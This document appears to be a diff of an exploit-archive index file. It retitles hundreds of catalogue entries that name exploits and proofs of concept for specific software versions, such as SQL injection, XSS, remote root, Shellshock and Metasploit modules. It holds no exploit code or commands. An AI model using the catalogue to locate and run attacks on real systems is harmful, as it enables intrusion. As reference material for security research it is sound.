Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash PoC (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0 @@ -30525,7 +30525,7 @@ id,file,description,date,author,platform,type,port 33876,platforms/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 - Remote DoS / arbitrary memory read",2007-09-14,mu-b,multiple,dos,0 33877,platforms/multiple/remote/33877.c,"NovaSTOR NovaNET 12.0 - Remote Root Exploit",2007-09-25,mu-b,multiple,remote,0 33878,platforms/multiple/remote/33878.c,"NovaSTOR NovaNET 12.0 - Remote SYSTEM Exploit",2007-09-25,mu-b,multiple,remote,0 -33879,platforms/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP 13.0 Remote DoS",2007-10-02,mu-b,multiple,dos,0 +33879,platforms/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP 13.0 - Remote DoS",2007-10-02,mu-b,multiple,dos,0 33882,platforms/php/webapps/33882.txt,"Cyber CMS - 'faq.php' SQL Injection",2009-11-26,hc0de,php,webapps,0 33883,platforms/php/webapps/33883.txt,"Kasseler CMS 2.0.5 - 'index.php' Cross-Site Scripting",2010-04-26,indoushka,php,webapps,0 33884,platforms/php/webapps/33884.txt,"Zikula Application Framework 1.2.2 ZLanguage.php lang Parameter XSS",2010-04-13,"High-Tech Bridge SA",php,webapps,0 @@ -30550,7 +30550,7 @@ id,file,description,date,author,platform,type,port 34102,platforms/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80 33904,platforms/linux/local/33904.txt,"check_dhcp 2.0.2 (Nagios Plugins) - Arbitrary Option File Read Race Condition Exploit",2014-06-28,"Dawid Golunski",linux,local,0 33905,platforms/multiple/remote/33905.txt,"Apache ActiveMQ 5.3 - 'admin/queueBrowse' Cross-Site Scripting",2010-04-28,"arun kethipelly",multiple,remote,0 -33906,platforms/php/webapps/33906.txt,"velBox 1.2 Insecure Cookie Authentication Bypass",2010-04-28,indoushka,php,webapps,0 +33906,platforms/php/webapps/33906.txt,"velBox 1.2 - Insecure Cookie Authentication Bypass",2010-04-28,indoushka,php,webapps,0 33907,platforms/multiple/remote/33907.txt,"ZKSoftware 'ZK5000' Remote Information Disclosure",2010-03-20,fb1h2s,multiple,remote,0 33908,platforms/php/webapps/33908.txt,"Your Articles Directory Login Option SQL Injection",2010-04-29,Sid3^effects,php,webapps,0 33909,platforms/php/webapps/33909.txt,"Tele Data's Contact Management Server 0.9 - 'username' Parameter SQL Injection",2010-04-28,"John Leitch",php,webapps,0 @@ -30647,7 +30647,7 @@ id,file,description,date,author,platform,type,port 34013,platforms/windows/remote/34013.txt,"McAfee Email Gateway 6.7.1 - 'systemWebAdminConfig.do' Remote Security Bypass",2010-05-19,"Nahuel Grisolia",windows,remote,0 34014,platforms/php/webapps/34014.txt,"Web 2.0 Social Network Freunde Community System - 'user.php' SQL Injection",2010-05-08,"Easy Laster",php,webapps,0 34015,platforms/php/webapps/34015.txt,"SoftDirec 1.05 - 'delete_confirm.php' Cross-Site Scripting",2010-05-19,indoushka,php,webapps,0 -34016,platforms/php/webapps/34016.txt,"Snipe Gallery 3.1 gallery.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 +34016,platforms/php/webapps/34016.txt,"Snipe Gallery 3.1 - gallery.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 34017,platforms/php/webapps/34017.txt,"Snipe Gallery 3.1 image.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 34018,platforms/hardware/remote/34018.txt,"U.S.Robotics USR5463 0.06 Firmware setup_ddns.exe HTML Injection",2010-05-20,SH4V,hardware,remote,0 34021,platforms/php/webapps/34021.txt,"Joomla! 'com_horses' Component - 'id' Parameter SQL Injection",2010-05-19,"Kernel Security Group",php,webapps,0 @@ -30735,7 +30735,7 @@ id,file,description,date,author,platform,type,port 34116,platforms/php/webapps/34116.txt,"Bits Video Script 2.05 Gold Beta - showcasesearch.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 34117,platforms/php/webapps/34117.txt,"Bits Video Script 2.05 Gold Beta - showcase2search.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 34118,platforms/php/webapps/34118.txt,"Hitmaaan Gallery 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,indoushka,php,webapps,0 -34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 addvideo.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 +34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 - addvideo.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 register.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 34121,platforms/php/webapps/34121.txt,"Bits Video Script 2.04/2.05 - 'search.php' Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial Of Service",2010-07-15,"Luigi Auriemma",multiple,dos,0 @@ -30767,7 +30767,7 @@ id,file,description,date,author,platform,type,port 34135,platforms/windows/dos/34135.py,"DjVuLibre 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0 34149,platforms/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",hardware,webapps,0 34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial Of Service",2010-06-17,"Luigi Auriemma",windows,dos,0 -34159,platforms/php/webapps/34159.txt,"Gallery XML Joomla! Component 1.1 - SQL Injection and Local File Inclusion",2010-06-18,jdc,php,webapps,0 +34159,platforms/php/webapps/34159.txt,"Gallery XML Joomla! Component 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps,0 34151,platforms/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution",2010-06-16,h07,windows,dos,0 34152,platforms/linux/remote/34152.txt,"CUPS 1.4.2 Web Interface Information Disclosure",2010-06-15,"Luca Carettoni",linux,remote,0 34160,platforms/php/remote/34160.txt,"Omeka 2.2.1 - Remote Code Execution Exploit",2014-07-24,LiquidWorm,php,remote,80 @@ -30814,9 +30814,9 @@ id,file,description,date,author,platform,type,port 34207,platforms/php/webapps/34207.txt,"Customer Paradigm PageDirector - 'id' Parameter SQL Injection",2010-06-28,Tr0y-x,php,webapps,0 34208,platforms/hardware/remote/34208.txt,"D-Link DAP-1160 Wireless Access Point DCC Protocol Security Bypass",2010-06-28,"Cristofaro Mune",hardware,remote,0 34209,platforms/php/webapps/34209.txt,"BlaherTech Placeto CMS - 'Username' Parameter SQL Injection",2010-06-28,S.W.T,php,webapps,0 -34210,platforms/php/webapps/34210.txt,"OneCMS 2.6.1 admin/admin.php cat Parameter XSS",2010-06-24,"High-Tech Bridge SA",php,webapps,0 +34210,platforms/php/webapps/34210.txt,"OneCMS 2.6.1 - admin/admin.php cat Parameter XSS",2010-06-24,"High-Tech Bridge SA",php,webapps,0 34211,platforms/php/webapps/34211.html,"OneCMS 2.6.1 - search.php search Parameter SQL Injection",2010-06-24,"High-Tech Bridge SA",php,webapps,0 -34212,platforms/php/webapps/34212.html,"OneCMS 2.6.1 admin/admin.php Short1 Parameter XSS",2010-06-24,"High-Tech Bridge SA",php,webapps,0 +34212,platforms/php/webapps/34212.html,"OneCMS 2.6.1 - admin/admin.php Short1 Parameter XSS",2010-06-24,"High-Tech Bridge SA",php,webapps,0 34213,platforms/php/webapps/34213.txt,"PHP Bible Search bible.php chapter Parameter SQL Injection",2010-06-29,"L0rd CrusAd3r",php,webapps,0 34214,platforms/php/webapps/34214.txt,"PHP Bible Search bible.php chapter Parameter XSS",2010-06-29,"L0rd CrusAd3r",php,webapps,0 34215,platforms/php/webapps/34215.txt,"MySpace Clone 2010 - SQL Injection / Cross-Site Scripting",2010-06-28,"L0rd CrusAd3r",php,webapps,0 @@ -30851,7 +30851,7 @@ id,file,description,date,author,platform,type,port 34338,platforms/php/webapps/34338.html,"Pixie 1.0.4 - HTML Injection / Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34243,platforms/ios/webapps/34243.txt,"Photo WiFi Transfer 1.01 - Directory Traversal",2014-08-02,Vulnerability-Lab,ios,webapps,8080 34362,platforms/linux/remote/34362.rb,"Gitlab-shell Code Execution",2014-08-19,Metasploit,linux,remote,443 -34245,platforms/php/webapps/34245.txt,"ArticleFR 11.06.2014 (data.php) - Privilege Escalation",2014-08-02,"High-Tech Bridge SA",php,webapps,80 +34245,platforms/php/webapps/34245.txt,"ArticleFR 11.06.2014 - (data.php) Privilege Escalation",2014-08-02,"High-Tech Bridge SA",php,webapps,80 34246,platforms/php/webapps/34246.txt,"AL-Caricatier 2.5 - 'comment.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 34248,platforms/multiple/dos/34248.txt,"EDItran Communications Platform (editcp) 4.1 - Remote Buffer Overflow",2010-07-05,"Pedro Andujar",multiple,dos,0 34249,platforms/linux/dos/34249.txt,"Freeciv 2.2.1 - Multiple Remote Denial Of Service Vulnerabilities",2010-07-03,"Luigi Auriemma",linux,dos,0 @@ -30924,7 +30924,7 @@ id,file,description,date,author,platform,type,port 34317,platforms/php/webapps/34317.txt,"WS Interactive Automne 4.0 - '228-recherche.php' Cross-Site Scripting",2009-12-13,loneferret,php,webapps,0 34318,platforms/php/webapps/34318.txt,"Zeecareers 2.0 - Cross-Site Scripting / Authentication Bypass",2009-12-13,bi0,php,webapps,0 34319,platforms/php/webapps/34319.txt,"Ez Cart - 'index.php' Cross-Site Scripting",2009-12-14,anti-gov,php,webapps,0 -34320,platforms/php/webapps/34320.txt,"GetSimple CMS 2.01 admin/template/error_checking.php Multiple Parameter XSS",2010-07-15,Leonard,php,webapps,0 +34320,platforms/php/webapps/34320.txt,"GetSimple CMS 2.01 - admin/template/error_checking.php Multiple Parameter XSS",2010-07-15,Leonard,php,webapps,0 34321,platforms/php/webapps/34321.txt,"Spitfire 1.0.381 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-15,"Nijel the Destroyer",php,webapps,0 34322,platforms/php/webapps/34322.txt,"phpwcms 1.4.5 - 'phpwcms.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34323,platforms/php/webapps/34323.html,"DSite CMS 4.81 - 'modmenu.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 @@ -30993,7 +30993,7 @@ id,file,description,date,author,platform,type,port 34400,platforms/php/webapps/34400.txt,"RaidenTunes - 'music_out.php' Cross-Site Scripting",2014-08-03,LiquidWorm,php,webapps,0 34401,platforms/php/webapps/34401.txt,"PHP168 Template Editor - 'filename' Parameter Directory Traversal",2009-10-04,esnra,php,webapps,0 34402,platforms/php/webapps/34402.txt,"OpenSolution Quick.Cart - Local File Inclusion / Cross-Site Scripting",2009-10-08,kl3ryk,php,webapps,0 -34403,platforms/windows/dos/34403.pl,"Quick - 'n Easy FTP Server 3.9.1 USER Command Remote Buffer Overflow",2010-07-22,demonalex,windows,dos,0 +34403,platforms/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 - USER Command Remote Buffer Overflow",2010-07-22,demonalex,windows,dos,0 34404,platforms/windows/dos/34404.pl,"K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,windows,dos,0 34405,platforms/php/webapps/34405.txt,"PHP Stock Management System 1.02 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-08-25,"Ragha Deepthi K R",php,webapps,0 34408,platforms/multiple/webapps/34408.txt,"Innovaphone PBX Admin-GUI - CSRF",2014-08-25,"Rainer Giedat",multiple,webapps,80 @@ -31010,7 +31010,7 @@ id,file,description,date,author,platform,type,port 34419,platforms/multiple/webapps/34419.txt,"ntopng 1.2.0 - XSS Injection",2014-08-26,"Steffen Bauch",multiple,webapps,0 34420,platforms/cgi/webapps/34420.txt,"VTLS Virtua InfoStation.cgi - SQL Injection",2014-08-26,"José Tozo",cgi,webapps,80 34421,platforms/linux/local/34421.c,"glibc - Off-by-One NUL Byte gconv_translit_find Exploit",2014-08-27,"taviso and scarybeasts",linux,local,0 -34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x < 4.1.2 (search.php cat param) - SQL Injection Exploit",2014-09-03,D35m0nd142,php,webapps,80 +34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x < 4.1.2 - (search.php cat param) SQL Injection Exploit",2014-09-03,D35m0nd142,php,webapps,80 34426,platforms/linux/remote/34426.txt,"uzbl 'uzbl-core' - '@SELECTED_URI' Mouse Button Bindings Command Injection",2010-08-05,Chuzz,linux,remote,0 34427,platforms/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption",2010-08-07,"Georgi Guninski",linux,dos,0 34424,platforms/php/webapps/34424.txt,"WooCommerce Store Exporter 1.7.5 - Multiple XSS Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0 @@ -31030,7 +31030,7 @@ id,file,description,date,author,platform,type,port 34442,platforms/windows/dos/34442.html,"Kylinsoft InstantGet 2.08 - ActiveX Control 'ShowBar' Method Buffer Overflow",2009-09-19,the_Edit0r,windows,dos,0 34443,platforms/php/webapps/34443.txt,"PaoLink 1.0 - 'scrivi.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 34444,platforms/php/webapps/34444.txt,"RSSMediaScript - 'index.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 -34445,platforms/php/webapps/34445.txt,"LiveStreet 0.2 Comment Topic Header XSS",2009-08-31,Inj3ct0r,php,webapps,0 +34445,platforms/php/webapps/34445.txt,"LiveStreet 0.2 - Comment Topic Header XSS",2009-08-31,Inj3ct0r,php,webapps,0 34446,platforms/php/webapps/34446.txt,"LiveStreet 0.2 include/ajax/blogInfo.php asd Parameter XSS",2009-08-31,Inj3ct0r,php,webapps,0 34447,platforms/php/webapps/34447.py,"Plogger 1.0-RC1 - Authenticated Arbitrary File Upload",2014-08-28,b0z,php,webapps,80 34448,platforms/multiple/remote/34448.rb,"Firefox WebIDL Privileged Javascript Injection",2014-08-28,Metasploit,multiple,remote,0 @@ -31076,7 +31076,7 @@ id,file,description,date,author,platform,type,port 34494,platforms/php/webapps/34494.txt,"ViArt Helpdesk products.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 34495,platforms/php/webapps/34495.txt,"ViArt Helpdesk article.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 34496,platforms/php/webapps/34496.txt,"ViArt Helpdesk product_details.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 -34500,platforms/multiple/remote/34500.html,"Flock Browser 3.0.0 Malformed Bookmark HTML Injection",2010-08-19,Lostmon,multiple,remote,0 +34500,platforms/multiple/remote/34500.html,"Flock Browser 3.0.0 - Malformed Bookmark HTML Injection",2010-08-19,Lostmon,multiple,remote,0 34501,platforms/php/webapps/34501.txt,"Hitron Soft Answer Me - 'answers.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34502,platforms/windows/dos/34502.py,"Serveez 0.1.7 - 'If-Modified-Since' Header Stack Buffer Overflow",2009-08-09,"lvac lvac",windows,dos,0 34503,platforms/php/webapps/34503.txt,"Syntax Highlighter 3.0.83 - 'index.html' HTML Injection",2010-08-19,indoushka,php,webapps,0 @@ -31086,7 +31086,7 @@ id,file,description,date,author,platform,type,port 34507,platforms/linux/remote/34507.txt,"Nagios XI - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",linux,remote,0 34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 - 'register/next' SQL Injection",2010-08-23,Sweet,php,webapps,0 34510,platforms/linux/dos/34510.txt,"OraclMySQL 5.1.48 - 'LOAD DATA INFILE' Denial Of Service",2010-08-20,"Elena Stepanova",linux,dos,0 -34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes (admin-ajax.php img param) - Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 +34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes - (admin-ajax.php img param) Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 34512,platforms/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling SEH Buffer Overflow",2014-09-01,k3170makan,windows,local,0 34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Stored XSS",2014-09-01,"Prakhar Prasad",multiple,webapps,0 34514,platforms/php/webapps/34514.txt,"WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80 @@ -31136,7 +31136,7 @@ id,file,description,date,author,platform,type,port 34563,platforms/php/webapps/34563.txt,"OneCMS 2.6.1 - 'index.php' Cross-Site Scripting",2010-09-02,anT!-Tr0J4n,php,webapps,0 34564,platforms/php/webapps/34564.txt,"CMS WebManager-Pro - 'c.php' SQL Injection",2010-09-02,MustLive,php,webapps,0 34565,platforms/php/webapps/34565.txt,"NuSOAP 0.9.5 - 'nusoap.php' Cross-Site Scripting",2010-09-03,"Bogdan Calin",php,webapps,0 -34578,platforms/php/webapps/34578.txt,"WordPress Acento Theme (view-pdf.php file param) - Arbitrary File Download",2014-09-08,alieye,php,webapps,80 +34578,platforms/php/webapps/34578.txt,"WordPress Acento Theme - (view-pdf.php file param) Arbitrary File Download",2014-09-08,alieye,php,webapps,80 34581,platforms/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 34571,platforms/php/webapps/34571.py,"Joomla Spider Calendar 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0 34572,platforms/php/webapps/34572.txt,"WordPress Bulk Delete Users by Email Plugin 1.0 - CSRF",2014-09-08,"Fikri Fadzil",php,webapps,0 @@ -31184,7 +31184,7 @@ id,file,description,date,author,platform,type,port 34622,platforms/windows/remote/34622.txt,"Axigen Webmail 1.0.1 - Directory Traversal",2010-09-15,"Bogdan Calin",windows,remote,0 34751,platforms/hardware/webapps/34751.pl,"ZyXEL Prestig P-660HNU-T1 ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80 34624,platforms/php/webapps/34624.txt,"OroCRM - Stored XSS",2014-09-11,Provensec,php,webapps,80 -34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 (index.php contacts_id param) - SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 +34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 - (index.php contacts_id param)SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion",2014-09-11,Vulnerability-Lab,ios,webapps,9900 34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent XSS",2014-09-11,Vulnerability-Lab,ios,webapps,0 34628,platforms/php/webapps/34628.txt,"Santafox 2.0.2 - 'search' Parameter Cross-Site Scripting",2010-09-06,"High-Tech Bridge SA",php,webapps,0 @@ -31259,7 +31259,7 @@ id,file,description,date,author,platform,type,port 34702,platforms/php/webapps/34702.txt,"TurnkeySetup Net Marketing 6.0 - 'faqs.php' Cross-Site Scripting",2009-07-24,Moudi,php,webapps,0 34703,platforms/php/webapps/34703.txt,"Million Dollar Pixel Ads Cross-Site Scripting / SQL Injection",2009-07-24,Moudi,php,webapps,0 34704,platforms/php/webapps/34704.txt,"MyDLstore Pixel Ad Script - 'payment.php' Cross-Site Scripting",2009-07-21,Moudi,php,webapps,0 -34705,platforms/php/webapps/34705.txt,"APBook 1.3 Admin Login Multiple SQL Injection",2009-07-21,n3w7u,php,webapps,0 +34705,platforms/php/webapps/34705.txt,"APBook 1.3 - Admin Login Multiple SQL Injection",2009-07-21,n3w7u,php,webapps,0 34706,platforms/php/webapps/34706.txt,"MyDLstore Meta Search Engine Script 1.0 - 'url' Parameter Remote File Inclusion",2009-07-21,Moudi,php,webapps,0 34707,platforms/php/webapps/34707.txt,"RadAFFILIATE Links - 'index.php' Cross-Site Scripting",2009-08-17,Moudi,php,webapps,0 34708,platforms/php/webapps/34708.pl,"Joomla! 'com_tax' Component - 'eid' Parameter SQL Injection",2010-09-23,FL0RiX,php,webapps,0 @@ -31308,14 +31308,14 @@ id,file,description,date,author,platform,type,port 34753,platforms/asp/webapps/34753.py,"Onlineon E-Ticaret Database Disclosure Exploit",2014-09-24,ZoRLu,asp,webapps,80 34754,platforms/php/webapps/34754.py,"Joomla Face Gallery 1.0 - Multiple vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80 34755,platforms/php/webapps/34755.py,"Joomla Mac Gallery 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80 -34756,platforms/windows/remote/34756.rb,"EMC AlphaStor Device Manager Opcode 0x75 Command Injection",2014-09-24,Metasploit,windows,remote,3000 +34756,platforms/windows/remote/34756.rb,"EMC AlphaStor Device Manager Opcode 0x75 - Command Injection",2014-09-24,Metasploit,windows,remote,3000 34757,platforms/windows/remote/34757.rb,"Advantech WebAccess dvs.ocx GetColor Buffer Overflow",2014-09-24,Metasploit,windows,remote,0 34758,platforms/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Path Traversal LFI",2014-09-24,Securify,php,webapps,80 34759,platforms/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,php,webapps,80 34760,platforms/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Stored XSS",2014-09-24,"Kenneth F. Belva",php,webapps,80 34761,platforms/php/webapps/34761.txt,"webEdition 6.3.8.0 (SVN-Revision: 6985) - Path Traversal",2014-09-24,"High-Tech Bridge SA",php,webapps,80 34762,platforms/php/webapps/34762.txt,"WordPress Login Widget With Shortcode 3.1.1 Plugin - Multiple Vulnerabilities",2014-09-25,dxw,php,webapps,80 -34763,platforms/php/webapps/34763.txt,"OsClass 3.4.1 (index.php file param) - Local File Inclusion",2014-09-25,Netsparker,php,webapps,80 +34763,platforms/php/webapps/34763.txt,"OsClass 3.4.1 - (index.php file param) Local File Inclusion",2014-09-25,Netsparker,php,webapps,80 34764,platforms/php/webapps/34764.txt,"Cart Engine 3.0 - Multiple Vulnerabilities",2014-09-25,"Quantum Leap",php,webapps,80 34765,platforms/linux/remote/34765.txt,"GNU Bash - Environment Variable Command Injection (Shellshock)",2014-09-25,"Stephane Chazelas",linux,remote,0 34766,platforms/linux/remote/34766.php,"Bash - Environment Variables Code Injection Exploit (Shellshock)",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80 @@ -31390,7 +31390,7 @@ id,file,description,date,author,platform,type,port 34848,platforms/windows/remote/34848.c,"1CLICK DVD Converter 2.1.7.1 - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2010-10-15,anT!-Tr0J4n,windows,remote,0 34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 - 'req' Parameter Local File Inclusion / Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 34850,platforms/php/webapps/34850.txt,"eXV2 CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps,0 -34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 (joblogs.php jobid param) - SQL Injection",2014-10-02,wishnusakti,php,webapps,80 +34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 - (joblogs.php jobid param) SQL Injection",2014-10-02,wishnusakti,php,webapps,80 34852,platforms/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",windows,webapps,80 34853,platforms/windows/remote/34853.c,"PowerDVD 5.0.1107 - 'trigger.dll' DLL Loading Arbitrary Code Execution",2010-10-19,"Inj3cti0n P4ck3t",windows,remote,0 34854,platforms/php/webapps/34854.txt,"Wordpress All In One WP Security & Firewall 3.8.3 Plugin - Persistent XSS",2014-10-02,Vulnerability-Lab,php,webapps,80 @@ -31471,7 +31471,7 @@ id,file,description,date,author,platform,type,port 34935,platforms/php/webapps/34935.txt,"LES PACKS - 'ID' Parameter SQL Injection",2010-10-27,Cru3l.b0y,php,webapps,0 34936,platforms/asp/webapps/34936.txt,"i-Gallery 3.4/4.1 - 'streamfile.asp' Multiple Directory Traversal Vulnerabilities",2009-06-03,"Stefano Angaran",asp,webapps,0 34937,platforms/php/webapps/34937.txt,"Feindura CMS Groupware Multiple Local File Inclusion and Cross-Site Scripting Vulnerabilities",2010-10-28,Justanotherhacker.com,php,webapps,0 -34938,platforms/windows/dos/34938.txt,"Teamspeak 2.0.32.60 Memory Corruption",2010-10-28,"Jokaim and nSense",windows,dos,0 +34938,platforms/windows/dos/34938.txt,"Teamspeak 2.0.32.60 - Memory Corruption",2010-10-28,"Jokaim and nSense",windows,dos,0 34939,platforms/php/webapps/34939.txt,"W-Agora 4.1.5 - Local File Inclusion / Cross-Site Scripting",2010-10-27,MustLive,php,webapps,0 34940,platforms/php/webapps/34940.txt,"212cafe WebBoard 2.90 beta - 'view.php' Directory Traversal",2009-05-29,MrDoug,php,webapps,0 34941,platforms/php/webapps/34941.txt,"Intergo Arcade Trade Script 1.0 - 'q' Parameter Cross-Site Scripting",2009-05-25,SmOk3,php,webapps,0 @@ -31548,7 +31548,7 @@ id,file,description,date,author,platform,type,port 35021,platforms/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation",2014-10-20,Metasploit,linux,local,0 35025,platforms/php/webapps/35025.html,"Car Portal 2.0 - 'car_make' Parameter Cross-Site Scripting",2010-11-29,"Underground Stockholm",php,webapps,0 35026,platforms/php/webapps/35026.txt,"Joomla Store Directory - 'id' Parameter SQL Injection",2010-11-30,XroGuE,php,webapps,0 -35027,platforms/php/webapps/35027.txt,"E-lokaler CMS 2 Admin Login Multiple SQL Injection",2010-11-26,ali_err0r,php,webapps,0 +35027,platforms/php/webapps/35027.txt,"E-lokaler CMS 2 - Admin Login Multiple SQL Injection",2010-11-26,ali_err0r,php,webapps,0 35028,platforms/php/webapps/35028.txt,"SmartBox - 'page_id' Parameter SQL Injection",2010-11-26,KnocKout,php,webapps,0 35032,platforms/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService Arbitrary File Upload",2014-10-21,Metasploit,windows,remote,0 35031,platforms/asp/webapps/35031.txt,"BugTracker.NET 3.4.4 - SQL Injection / Cross-Site Scripting",2010-11-30,BugTracker.NET,asp,webapps,0 @@ -31587,7 +31587,7 @@ id,file,description,date,author,platform,type,port 35061,platforms/linux/dos/35061.c,"GNU glibc 'regcomp()' Stack Exhaustion Denial Of Service",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0 35062,platforms/multiple/remote/35062.txt,"RDM Embedded Lock Manager < 9.x - 'lm_tcp' Service Buffer Overflow",2010-12-07,"Luigi Auriemma",multiple,remote,0 35063,platforms/php/webapps/35063.txt,"Zimplit CMS - zimplit.php file Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0 -35064,platforms/php/webapps/35064.txt,"Zimplit CMS English_manual_version_2.php - client Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0 +35064,platforms/php/webapps/35064.txt,"Zimplit CMS - English_manual_version_2.php client Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0 35065,platforms/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps,0 35066,platforms/php/webapps/35066.txt,"WordPress Processing Embed Plugin 0.5 - 'pluginurl' Parameter Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0 35067,platforms/php/webapps/35067.txt,"WordPress Safe Search Plugin 'v1' Parameter - Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0 @@ -31615,7 +31615,7 @@ id,file,description,date,author,platform,type,port 35089,platforms/php/webapps/35089.txt,"Joomla Jeformcr - 'id' Parameter SQL Injection",2010-12-09,FL0RiX,php,webapps,0 35090,platforms/php/webapps/35090.txt,"JExtensions Property Finder Component for Joomla! - 'sf_id' Parameter SQL Injection",2010-12-10,FL0RiX,php,webapps,0 35091,platforms/php/webapps/35091.txt,"ManageEngine EventLog Analyzer 6.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,"Rob Kraus",php,webapps,0 -35092,platforms/multiple/remote/35092.html,"Helix Server 14.0.1.571 Administration Interface Cross-Site Request Forgery",2010-12-10,"John Leitch",multiple,remote,0 +35092,platforms/multiple/remote/35092.html,"Helix Server 14.0.1.571 - Administration Interface Cross-Site Request Forgery",2010-12-10,"John Leitch",multiple,remote,0 35093,platforms/cgi/webapps/35093.txt,"BizDir 05.10 - 'f_srch' Parameter Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",cgi,webapps,0 35094,platforms/php/webapps/35094.txt,"slickMsg 0.7-alpha - 'top.php' Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0 35095,platforms/linux/remote/35095.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - Multiple HTML Injection Vulnerabilities",2010-12-09,"Yosuke Hasegawa",linux,remote,0 @@ -31800,7 +31800,7 @@ 